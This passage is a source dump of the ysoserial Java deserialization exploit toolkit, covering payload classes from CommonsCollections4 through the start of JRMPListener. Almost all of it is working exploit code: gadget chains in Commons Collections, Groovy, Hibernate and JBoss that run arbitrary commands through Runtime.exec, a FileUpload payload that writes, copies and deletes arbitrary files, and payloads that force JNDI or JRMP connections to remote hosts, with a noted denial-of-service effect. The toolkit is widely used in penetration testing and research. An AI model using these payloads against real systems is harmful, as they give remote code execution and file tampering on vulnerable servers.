Class[] paramTypes = new Class[] { String.class };
Object[] args = new Object[] { "foo" };
InstantiateTransformer instantiate = new InstantiateTransformer(
paramTypes, args);
// grab defensively copied arrays
paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");
ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });
// create queue with numbers
PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
queue.add(1);
queue.add(1);
// swap in values to arm
Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
paramTypes[0] = Templates.class;
args[0] = templates;
return queue;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CommonsCollections4.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections5.java
================================================
package ysoserial.payloads;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.Map;
import javax.management.BadAttributeValueExpException;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/*
Gadget chain:
ObjectInputStream.readObject()
BadAttributeValueExpException.readObject()
TiedMapEntry.toString()
LazyMap.get()
ChainedTransformer.transform()
ConstantTransformer.transform()
InvokerTransformer.transform()
Method.invoke()
Class.getMethod()
InvokerTransformer.transform()
Method.invoke()
Runtime.getRuntime()
InvokerTransformer.transform()
Method.invoke()
Runtime.exec()
Requires:
commons-collections
*/
/*
This only works in JDK 8u76 and WITHOUT a security manager
https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({ Authors.MATTHIASKAISER, Authors.JASINNER })
public class CommonsCollections5 extends PayloadRunner implements ObjectPayload<BadAttributeValueExpException> {
public BadAttributeValueExpException getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
// inert chain for setup
final Transformer transformerChain = new ChainedTransformer(
new Transformer[]{ new ConstantTransformer(1) });
// real chain for after setup
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
BadAttributeValueExpException val = new BadAttributeValueExpException(null);
Field valfield = val.getClass().getDeclaredField("val");
Reflections.setAccessible(valfield);
valfield.set(val, entry);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain
return val;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CommonsCollections5.class, args);
}
public static boolean isApplicableJavaVersion() {
return JavaVersion.isBadAttrValExcReadObj();
}
}
================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections6.java
================================================
package ysoserial.payloads;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
/*
Gadget chain:
java.io.ObjectInputStream.readObject()
java.util.HashSet.readObject()
java.util.HashMap.put()
java.util.HashMap.hash()
org.apache.commons.collections.keyvalue.TiedMapEntry.hashCode()
org.apache.commons.collections.keyvalue.TiedMapEntry.getValue()
org.apache.commons.collections.map.LazyMap.get()
org.apache.commons.collections.functors.ChainedTransformer.transform()
org.apache.commons.collections.functors.InvokerTransformer.transform()
java.lang.reflect.Method.invoke()
java.lang.Runtime.exec()
by @matthias_kaiser
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({ Authors.MATTHIASKAISER })
public class CommonsCollections6 extends PayloadRunner implements ObjectPayload<Serializable> {
public Serializable getObject(final String command) throws Exception {
final String[] execArgs = new String[] { command };
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] {
String.class, Class[].class }, new Object[] {
"getRuntime", new Class[0] }),
new InvokerTransformer("invoke", new Class[] {
Object.class, Object[].class }, new Object[] {
null, new Object[0] }),
new InvokerTransformer("exec",
new Class[] { String.class }, execArgs),
new ConstantTransformer(1) };
Transformer transformerChain = new ChainedTransformer(transformers);
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
HashSet map = new HashSet(1);
map.add("foo");
Field f = null;
try {
f = HashSet.class.getDeclaredField("map");
} catch (NoSuchFieldException e) {
f = HashSet.class.getDeclaredField("backingMap");
}
Reflections.setAccessible(f);
HashMap innimpl = (HashMap) f.get(map);
Field f2 = null;
try {
f2 = HashMap.class.getDeclaredField("table");
} catch (NoSuchFieldException e) {
f2 = HashMap.class.getDeclaredField("elementData");
}
Reflections.setAccessible(f2);
Object[] array = (Object[]) f2.get(innimpl);
Object node = array[0];
if(node == null){
node = array[1];
}
Field keyField = null;
try{
keyField = node.getClass().getDeclaredField("key");
}catch(Exception e){
keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
}
Reflections.setAccessible(keyField);
keyField.set(node, entry);
return map;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CommonsCollections6.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/CommonsCollections7.java
================================================
package ysoserial.payloads;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;
/*
Payload method chain:
java.util.Hashtable.readObject
java.util.Hashtable.reconstitutionPut
org.apache.commons.collections.map.AbstractMapDecorator.equals
java.util.AbstractMap.equals
org.apache.commons.collections.map.LazyMap.get
org.apache.commons.collections.functors.ChainedTransformer.transform
org.apache.commons.collections.functors.InvokerTransformer.transform
java.lang.reflect.Method.invoke
sun.reflect.DelegatingMethodAccessorImpl.invoke
sun.reflect.NativeMethodAccessorImpl.invoke
sun.reflect.NativeMethodAccessorImpl.invoke0
java.lang.Runtime.exec
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"commons-collections:commons-collections:3.1"})
@Authors({Authors.SCRISTALLI, Authors.HANYRAX, Authors.EDOARDOVIGNATI})
public class CommonsCollections7 extends PayloadRunner implements ObjectPayload<Hashtable> {
public Hashtable getObject(final String command) throws Exception {
// Reusing transformer chain and LazyMap gadgets from previous payloads
final String[] execArgs = new String[]{command};
final Transformer transformerChain = new ChainedTransformer(new Transformer[]{});
final Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod",
new Class[]{String.class, Class[].class},
new Object[]{"getRuntime", new Class[0]}),
new InvokerTransformer("invoke",
new Class[]{Object.class, Object[].class},
new Object[]{null, new Object[0]}),
new InvokerTransformer("exec",
new Class[]{String.class},
execArgs),
new ConstantTransformer(1)};
Map innerMap1 = new HashMap();
Map innerMap2 = new HashMap();
// Creating two LazyMaps with colliding hashes, in order to force element comparison during readObject
Map lazyMap1 = LazyMap.decorate(innerMap1, transformerChain);
lazyMap1.put("yy", 1);
Map lazyMap2 = LazyMap.decorate(innerMap2, transformerChain);
lazyMap2.put("zZ", 1);
// Use the colliding Maps as keys in Hashtable
Hashtable hashtable = new Hashtable();
hashtable.put(lazyMap1, 1);
hashtable.put(lazyMap2, 2);
Reflections.setFieldValue(transformerChain, "iTransformers", transformers);
// Needed to ensure hash collision after previous manipulations
lazyMap2.remove("yy");
return hashtable;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(CommonsCollections7.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/DynamicDependencies.java
================================================
package ysoserial.payloads;
/**
* @author mbechler
*
*/
public interface DynamicDependencies {
}
================================================
FILE: src/main/java/ysoserial/payloads/FileUpload1.java
================================================
package ysoserial.payloads;
import java.io.File;
import java.io.IOException;
import java.io.OutputStream;
import java.util.Arrays;
import org.apache.commons.codec.binary.Base64;
import org.apache.commons.fileupload.disk.DiskFileItem;
import org.apache.commons.io.output.DeferredFileOutputStream;
import org.apache.commons.io.output.ThresholdingOutputStream;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/**
* Gadget chain:
* DiskFileItem.readObject()
*
* Arguments:
* - copyAndDelete;sourceFile;destDir
* - write;destDir;ascii-data
* - writeB64;destDir;base64-data
* - writeOld;destFile;ascii-data
* - writeOldB64;destFile;base64-data
*
* Yields:
* - copy an arbitraty file to an arbitrary directory (source file is deleted if possible)
* - pre 1.3.1 (+ old JRE): write data to an arbitrary file
* - 1.3.1+: write data to a more or less random file in an arbitrary directory
*
* @author mbechler
*/
@Dependencies ( {
"commons-fileupload:commons-fileupload:1.3.1",
"commons-io:commons-io:2.4"
} )
@PayloadTest(harness="ysoserial.test.payloads.FileUploadTest", precondition = "isApplicableJavaVersion", flaky = "possible race condition")
@Authors({ Authors.MBECHLER })
public class FileUpload1 implements ReleaseableObjectPayload<DiskFileItem> {
public static boolean isApplicableJavaVersion() {
return JavaVersion.isAtLeast(7);
}
public DiskFileItem getObject ( String command ) throws Exception {
String[] parts = command.split(";");
if ( parts.length == 3 && "copyAndDelete".equals(parts[ 0 ]) ) {
return copyAndDelete(parts[ 1 ], parts[ 2 ]);
}
else if ( parts.length == 3 && "write".equals(parts[ 0 ]) ) {
return write(parts[ 1 ], parts[ 2 ].getBytes("US-ASCII"));
}
else if ( parts.length == 3 && "writeB64".equals(parts[ 0 ]) ) {
return write(parts[ 1 ], Base64.decodeBase64(parts[ 2 ]));
}
else if ( parts.length == 3 && "writeOld".equals(parts[ 0 ]) ) {
return writePre131(parts[ 1 ], parts[ 2 ].getBytes("US-ASCII"));
}
else if ( parts.length == 3 && "writeOldB64".equals(parts[ 0 ]) ) {
return writePre131(parts[ 1 ], Base64.decodeBase64(parts[ 2 ]));
}
else {
throw new IllegalArgumentException("Unsupported command " + command + " " + Arrays.toString(parts));
}
}
public void release ( DiskFileItem obj ) throws Exception {
// otherwise the finalizer deletes the file
DeferredFileOutputStream dfos = new DeferredFileOutputStream(0, null);
Reflections.setFieldValue(obj, "dfos", dfos);
}
private static DiskFileItem copyAndDelete ( String copyAndDelete, String copyTo ) throws IOException, Exception {
return makePayload(0, copyTo, copyAndDelete, new byte[1]);
}
// writes data to a random filename (update_<per JVM random UUID>_<COUNTER>.tmp)
private static DiskFileItem write ( String dir, byte[] data ) throws IOException, Exception {
return makePayload(data.length + 1, dir, dir + "/whatever", data);
}
// writes data to an arbitrary file
private static DiskFileItem writePre131 ( String file, byte[] data ) throws IOException, Exception {
return makePayload(data.length + 1, file + "\0", file, data);
}
private static DiskFileItem makePayload ( int thresh, String repoPath, String filePath, byte[] data ) throws IOException, Exception {
// if thresh < written length, delete outputFile after copying to repository temp file
// otherwise write the contents to repository temp file
File repository = new File(repoPath);
DiskFileItem diskFileItem = new DiskFileItem("test", "application/octet-stream", false, "test", 100000, repository);
File outputFile = new File(filePath);
DeferredFileOutputStream dfos = new DeferredFileOutputStream(thresh, outputFile);
OutputStream os = (OutputStream) Reflections.getFieldValue(dfos, "memoryOutputStream");
os.write(data);
Reflections.getField(ThresholdingOutputStream.class, "written").set(dfos, data.length);
Reflections.setFieldValue(diskFileItem, "dfos", dfos);
Reflections.setFieldValue(diskFileItem, "sizeThreshold", 0);
return diskFileItem;
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(FileUpload1.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/Groovy1.java
================================================
package ysoserial.payloads;
import java.lang.reflect.InvocationHandler;
import java.util.Map;
import org.codehaus.groovy.runtime.ConvertedClosure;
import org.codehaus.groovy.runtime.MethodClosure;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
/*
Gadget chain:
ObjectInputStream.readObject()
PriorityQueue.readObject()
Comparator.compare() (Proxy)
ConvertedClosure.invoke()
MethodClosure.call()
...
Method.invoke()
Runtime.exec()
Requires:
groovy
*/
@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"org.codehaus.groovy:groovy:2.3.9"})
@Authors({ Authors.FROHOFF })
public class Groovy1 extends PayloadRunner implements ObjectPayload<InvocationHandler> {
public InvocationHandler getObject(final String command) throws Exception {
final ConvertedClosure closure = new ConvertedClosure(new MethodClosure(command, "execute"), "entrySet");
final Map map = Gadgets.createProxy(closure, Map.class);
final InvocationHandler handler = Gadgets.createMemoizedInvocationHandler(map);
return handler;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(Groovy1.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/Hibernate1.java
================================================
package ysoserial.payloads;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.Map;
import java.util.HashMap;
import org.hibernate.engine.spi.TypedValue;
import org.hibernate.tuple.component.AbstractComponentTuplizer;
import org.hibernate.tuple.component.PojoComponentTuplizer;
import org.hibernate.type.AbstractType;
import org.hibernate.type.ComponentType;
import org.hibernate.type.Type;
import org.hibernate.EntityMode;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/**
*
* org.hibernate.property.access.spi.GetterMethodImpl.get()
* org.hibernate.tuple.component.AbstractComponentTuplizer.getPropertyValue()
* org.hibernate.type.ComponentType.getPropertyValue(C)
* org.hibernate.type.ComponentType.getHashCode()
* org.hibernate.engine.spi.TypedValue$1.initialize()
* org.hibernate.engine.spi.TypedValue$1.initialize()
* org.hibernate.internal.util.ValueHolder.getValue()
* org.hibernate.engine.spi.TypedValue.hashCode()
*
*
* Requires:
* - Hibernate (>= 5 gives arbitrary method invocation, <5 getXYZ only)
*
* @author mbechler
*/
@Authors({ Authors.MBECHLER })
@PayloadTest(precondition = "isApplicableJavaVersion")
public class Hibernate1 implements ObjectPayload<Object>, DynamicDependencies {
public static boolean isApplicableJavaVersion() {
return JavaVersion.isAtLeast(7);
}
public static String[] getDependencies () {
if ( System.getProperty("hibernate5") != null ) {
return new String[] {
"org.hibernate:hibernate-core:5.0.7.Final", "aopalliance:aopalliance:1.0", "org.jboss.logging:jboss-logging:3.3.0.Final",
"javax.transaction:javax.transaction-api:1.2"
};
}
return new String[] {
"org.hibernate:hibernate-core:4.3.11.Final", "aopalliance:aopalliance:1.0", "org.jboss.logging:jboss-logging:3.3.0.Final",
"javax.transaction:javax.transaction-api:1.2", "dom4j:dom4j:1.6.1"
};
}
public static Object makeGetter ( Class<?> tplClass, String method ) throws NoSuchMethodException, SecurityException, InstantiationException,
IllegalAccessException, IllegalArgumentException, InvocationTargetException, ClassNotFoundException {
if ( System.getProperty("hibernate5") != null ) {
return makeHibernate5Getter(tplClass, method);
}
return makeHibernate4Getter(tplClass, method);
}
public static Object makeHibernate4Getter ( Class<?> tplClass, String method ) throws ClassNotFoundException, NoSuchMethodException,
SecurityException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {
Class<?> getterIf = Class.forName("org.hibernate.property.Getter");
Class<?> basicGetter = Class.forName("org.hibernate.property.BasicPropertyAccessor$BasicGetter");
Constructor<?> bgCon = basicGetter.getDeclaredConstructor(Class.class, Method.class, String.class);
Reflections.setAccessible(bgCon);
if ( !method.startsWith("get") ) {
throw new IllegalArgumentException("Hibernate4 can only call getters");
}
String propName = Character.toLowerCase(method.charAt(3)) + method.substring(4);
Object g = bgCon.newInstance(tplClass, tplClass.getDeclaredMethod(method), propName);
Object arr = Array.newInstance(getterIf, 1);
Array.set(arr, 0, g);
return arr;
}
public static Object makeHibernate5Getter ( Class<?> tplClass, String method ) throws NoSuchMethodException, SecurityException,
ClassNotFoundException, InstantiationException, IllegalAccessException, IllegalArgumentException, InvocationTargetException {
Class<?> getterIf = Class.forName("org.hibernate.property.access.spi.Getter");
Class<?> basicGetter = Class.forName("org.hibernate.property.access.spi.GetterMethodImpl");
Constructor<?> bgCon = basicGetter.getConstructor(Class.class, String.class, Method.class);
Object g = bgCon.newInstance(tplClass, "test", tplClass.getDeclaredMethod(method));
Object arr = Array.newInstance(getterIf, 1);
Array.set(arr, 0, g);
return arr;
}
public Object getObject ( String command ) throws Exception {
Object tpl = Gadgets.createTemplatesImpl(command);
Object getters = makeGetter(tpl.getClass(), "getOutputProperties");
return makeCaller(tpl, getters);
}
static Object makeCaller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
if ( System.getProperty("hibernate3") != null ) {
return makeHibernate3Caller(tpl, getters);
}
return makeHibernate45Caller(tpl, getters);
}
static Object makeHibernate45Caller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);
ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);
Reflections.setFieldValue(t, "componentTuplizer", tup);
Reflections.setFieldValue(t, "propertySpan", 1);
Reflections.setFieldValue(t, "propertyTypes", new Type[] {
t
});
TypedValue v1 = new TypedValue(t, null);
Reflections.setFieldValue(v1, "value", tpl);
Reflections.setFieldValue(v1, "type", t);
TypedValue v2 = new TypedValue(t, null);
Reflections.setFieldValue(v2, "value", tpl);
Reflections.setFieldValue(v2, "type", t);
return Gadgets.makeMap(v1, v2);
}
static Object makeHibernate3Caller ( Object tpl, Object getters ) throws NoSuchMethodException, InstantiationException, IllegalAccessException,
InvocationTargetException, NoSuchFieldException, Exception, ClassNotFoundException {
// Load at runtime to avoid dependency conflicts
Class entityEntityModeToTuplizerMappingClass = Class.forName("org.hibernate.tuple.entity.EntityEntityModeToTuplizerMapping");
Class entityModeToTuplizerMappingClass = Class.forName("org.hibernate.tuple.EntityModeToTuplizerMapping");
Class typedValueClass = Class.forName("org.hibernate.engine.TypedValue");
PojoComponentTuplizer tup = Reflections.createWithoutConstructor(PojoComponentTuplizer.class);
Reflections.getField(AbstractComponentTuplizer.class, "getters").set(tup, getters);
Reflections.getField(AbstractComponentTuplizer.class, "propertySpan").set(tup, 1);
ComponentType t = Reflections.createWithConstructor(ComponentType.class, AbstractType.class, new Class[0], new Object[0]);
HashMap hm = new HashMap();
hm.put(EntityMode.POJO, tup);
Object emtm = Reflections.createWithConstructor(entityEntityModeToTuplizerMappingClass, entityModeToTuplizerMappingClass, new Class[]{ Map.class }, new Object[]{ hm });
Reflections.setFieldValue(t, "tuplizerMapping", emtm);
Reflections.setFieldValue(t, "propertySpan", 1);
Reflections.setFieldValue(t, "propertyTypes", new Type[] {
t
});
Constructor<?> typedValueConstructor = typedValueClass.getDeclaredConstructor(Type.class, Object.class, EntityMode.class);
Object v1 = typedValueConstructor.newInstance(t, null, EntityMode.POJO);
Reflections.setFieldValue(v1, "value", tpl);
Reflections.setFieldValue(v1, "type", t);
Object v2 = typedValueConstructor.newInstance(t, null, EntityMode.POJO);
Reflections.setFieldValue(v2, "value", tpl);
Reflections.setFieldValue(v2, "type", t);
return Gadgets.makeMap(v1, v2);
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(Hibernate1.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/Hibernate2.java
================================================
package ysoserial.payloads;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import com.sun.rowset.JdbcRowSetImpl;
/**
*
* Another application filter bypass
*
* Needs a getter invocation that is provided by hibernate here
*
* javax.naming.InitialContext.InitialContext.lookup()
* com.sun.rowset.JdbcRowSetImpl.connect()
* com.sun.rowset.JdbcRowSetImpl.getDatabaseMetaData()
* org.hibernate.property.access.spi.GetterMethodImpl.get()
* org.hibernate.tuple.component.AbstractComponentTuplizer.getPropertyValue()
* org.hibernate.type.ComponentType.getPropertyValue(C)
* org.hibernate.type.ComponentType.getHashCode()
* org.hibernate.engine.spi.TypedValue$1.initialize()
* org.hibernate.engine.spi.TypedValue$1.initialize()
* org.hibernate.internal.util.ValueHolder.getValue()
* org.hibernate.engine.spi.TypedValue.hashCode()
*
*
* Requires:
* - Hibernate (>= 5 gives arbitrary method invocation, <5 getXYZ only)
*
* Arg:
* - JNDI name (i.e. rmi:<host>)
*
* Yields:
* - JNDI lookup invocation (e.g. connect to remote RMI)
*
* @author mbechler
*/
@SuppressWarnings ( {
"restriction"
} )
@PayloadTest(harness="ysoserial.test.payloads.JRMPReverseConnectTest", precondition = "isApplicableJavaVersion")
@Authors({ Authors.MBECHLER })
public class Hibernate2 implements ObjectPayload<Object>, DynamicDependencies {
public static boolean isApplicableJavaVersion() {
return JavaVersion.isAtLeast(7);
}
public static String[] getDependencies () {
return Hibernate1.getDependencies();
}
public Object getObject ( String command ) throws Exception {
JdbcRowSetImpl rs = new JdbcRowSetImpl();
rs.setDataSourceName(command);
return Hibernate1.makeCaller(rs,Hibernate1.makeGetter(rs.getClass(), "getDatabaseMetaData") );
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(Hibernate2.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/JBossInterceptors1.java
================================================
package ysoserial.payloads;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.jboss.interceptor.builder.InterceptionModelBuilder;
import org.jboss.interceptor.builder.MethodReference;
import org.jboss.interceptor.proxy.DefaultInvocationContextFactory;
import org.jboss.interceptor.proxy.InterceptorMethodHandler;
import org.jboss.interceptor.reader.ClassMetadataInterceptorReference;
import org.jboss.interceptor.reader.DefaultMethodMetadata;
import org.jboss.interceptor.reader.ReflectiveClassMetadata;
import org.jboss.interceptor.reader.SimpleInterceptorMetadata;
import org.jboss.interceptor.spi.instance.InterceptorInstantiator;
import org.jboss.interceptor.spi.metadata.InterceptorReference;
import org.jboss.interceptor.spi.metadata.MethodMetadata;
import org.jboss.interceptor.spi.model.InterceptionModel;
import org.jboss.interceptor.spi.model.InterceptionType;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import java.lang.reflect.Constructor;
import java.util.*;
/*
by @matthias_kaiser
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest(precondition = "isApplicableJavaVersion")
@Dependencies({ "javassist:javassist:3.12.1.GA", "org.jboss.interceptor:jboss-interceptor-core:2.0.0.Final",
"javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
"org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21" })
@Authors({ Authors.MATTHIASKAISER })
public class JBossInterceptors1 implements ObjectPayload<Object> {
public static boolean isApplicableJavaVersion() {
return JavaVersion.isAtLeast(7);
}
public Object getObject(final String command) throws Exception {
final Object gadget = Gadgets.createTemplatesImpl(command);
InterceptionModelBuilder builder = InterceptionModelBuilder.newBuilderFor(HashMap.class);
ReflectiveClassMetadata metadata = (ReflectiveClassMetadata) ReflectiveClassMetadata.of(HashMap.class);
InterceptorReference interceptorReference = ClassMetadataInterceptorReference.of(metadata);
Set<InterceptionType> s = new HashSet<InterceptionType>();
s.add(org.jboss.interceptor.spi.model.InterceptionType.POST_ACTIVATE);
Constructor defaultMethodMetadataConstructor = DefaultMethodMetadata.class.getDeclaredConstructor(Set.class, MethodReference.class);
Reflections.setAccessible(defaultMethodMetadataConstructor);
MethodMetadata methodMetadata = (MethodMetadata) defaultMethodMetadataConstructor.newInstance(s,
MethodReference.of(TemplatesImpl.class.getMethod("newTransformer"), true));
List list = new ArrayList();
list.add(methodMetadata);
Map<org.jboss.interceptor.spi.model.InterceptionType, List<MethodMetadata>> hashMap = new HashMap<org.jboss.interceptor.spi.model.InterceptionType, List<MethodMetadata>>();
hashMap.put(org.jboss.interceptor.spi.model.InterceptionType.POST_ACTIVATE, list);
SimpleInterceptorMetadata simpleInterceptorMetadata = new SimpleInterceptorMetadata(interceptorReference, true, hashMap);
builder.interceptAll().with(simpleInterceptorMetadata);
InterceptionModel model = builder.build();
HashMap map = new HashMap();
map.put("ysoserial", "ysoserial");
DefaultInvocationContextFactory factory = new DefaultInvocationContextFactory();
InterceptorInstantiator interceptorInstantiator = new InterceptorInstantiator() {
public Object createFor(InterceptorReference paramInterceptorReference) {
return gadget;
}
};
return new InterceptorMethodHandler(map, metadata, model, interceptorInstantiator, factory);
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(JBossInterceptors1.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/JRMPClient.java
================================================
package ysoserial.payloads;
import java.lang.reflect.Proxy;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
/**
*
*
* UnicastRef.newCall(RemoteObject, Operation[], int, long)
* DGCImpl_Stub.dirty(ObjID[], long, Lease)
* DGCClient$EndpointEntry.makeDirtyCall(Set<RefEntry>, long)
* DGCClient$EndpointEntry.registerRefs(List<LiveRef>)
* DGCClient.registerRefs(Endpoint, List<LiveRef>)
* LiveRef.read(ObjectInput, boolean)
* UnicastRef.readExternal(ObjectInput)
*
* Thread.start()
* DGCClient$EndpointEntry.<init>(Endpoint)
* DGCClient$EndpointEntry.lookup(Endpoint)
* DGCClient.registerRefs(Endpoint, List<LiveRef>)
* LiveRef.read(ObjectInput, boolean)
* UnicastRef.readExternal(ObjectInput)
*
* Requires:
* - JavaSE
*
* Argument:
* - host:port to connect to, host only chooses random port (DOS if repeated many times)
*
* Yields:
* * an established JRMP connection to the endpoint (if reachable)
* * a connected RMI Registry proxy
* * one system thread per endpoint (DOS)
*
* @author mbechler
*/
@SuppressWarnings ( {
"restriction"
} )
@PayloadTest( harness="ysoserial.test.payloads.JRMPReverseConnectSMTest")
@Authors({ Authors.MBECHLER })
public class JRMPClient extends PayloadRunner implements ObjectPayload<Registry> {
public Registry getObject ( final String command ) throws Exception {
String host;
int port;
int sep = command.indexOf(':');
if ( sep < 0 ) {
port = new Random().nextInt(65535);
host = command;
}
else {
host = command.substring(0, sep);
port = Integer.valueOf(command.substring(sep + 1));
}
ObjID id = new ObjID(new Random().nextInt()); // RMI registry
TCPEndpoint te = new TCPEndpoint(host, port);
UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
Registry proxy = (Registry) Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[] {
Registry.class
}, obj);
return proxy;
}
public static void main ( final String[] args ) throws Exception {
Thread.currentThread().setContextClassLoader(JRMPClient.class.getClassLoader());
PayloadRunner.run(JRMPClient.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/JRMPListener.java
================================================
package ysoserial.payloads;
import java.rmi.server.RemoteObject;
import java.rmi.server.RemoteRef;
import java.rmi.server.UnicastRemoteObject;
import sun.rmi.server.ActivationGroupImpl;
import sun.rmi.server.UnicastServerRef;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/**
